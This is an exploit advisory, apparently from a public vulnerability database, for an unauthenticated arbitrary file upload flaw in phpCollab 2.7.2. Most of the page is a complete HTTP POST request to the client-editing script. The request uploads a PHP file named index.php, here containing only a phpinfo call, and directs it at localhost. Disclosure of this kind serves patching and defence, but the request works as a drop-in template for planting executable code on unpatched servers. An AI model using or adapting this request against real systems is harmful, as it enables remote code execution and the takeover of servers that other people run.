phpCollab 2.7.2 - Arbitrary File Upload

2020.04.28
hk Trung Le (HK) hk
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#/ #* phpCollab 2.7.2 - Arbitrary File Upload #* Author : Trung Le #* Tutorial Video : https://www.youtube.com/watch?v=zHuJkoQe4Tc #* Twitter : @lethanhtrungdbp #* Facebook : fb.com/c0nc4nh0 #* Blog: baomatcoban.info #/ The following HTTP request allows an attacker to upload a malicious php file, without authentication. Thus, a file named after `$id.extension` is created. Request: ---------- POST /phpcol/clients/editclient.php?action=add& HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: multipart/form-data; boundary=---------------------------42876024093685464851592998730 Content-Length: 1280 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/phpcol/clients/editclient.php?& Upgrade-Insecure-Requests: 1 -----------------------------42876024093685464851592998730 Content-Disposition: form-data; name="MAX_FILE_SIZE" 100000000 -----------------------------42876024093685464851592998730 Content-Disposition: form-data; name="owner" 1 -----------------------------42876024093685464851592998730 Content-Disposition: form-data; name="name" Process 2.7 -----------------------------42876024093685464851592998730 Content-Disposition: form-data; name="address" -----------------------------42876024093685464851592998730 Content-Disposition: form-data; name="phone" -----------------------------42876024093685464851592998730 Content-Disposition: form-data; name="url" -----------------------------42876024093685464851592998730 Content-Disposition: form-data; name="email" -----------------------------42876024093685464851592998730 Content-Disposition: form-data; name="comments" -----------------------------42876024093685464851592998730 Content-Disposition: form-data; name="hourly_rate" -----------------------------42876024093685464851592998730 Content-Disposition: form-data; name="upload"; filename="index.php" Content-Type: application/octet-stream <?php phpinfo(); -----------------------------42876024093685464851592998730-- ----------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top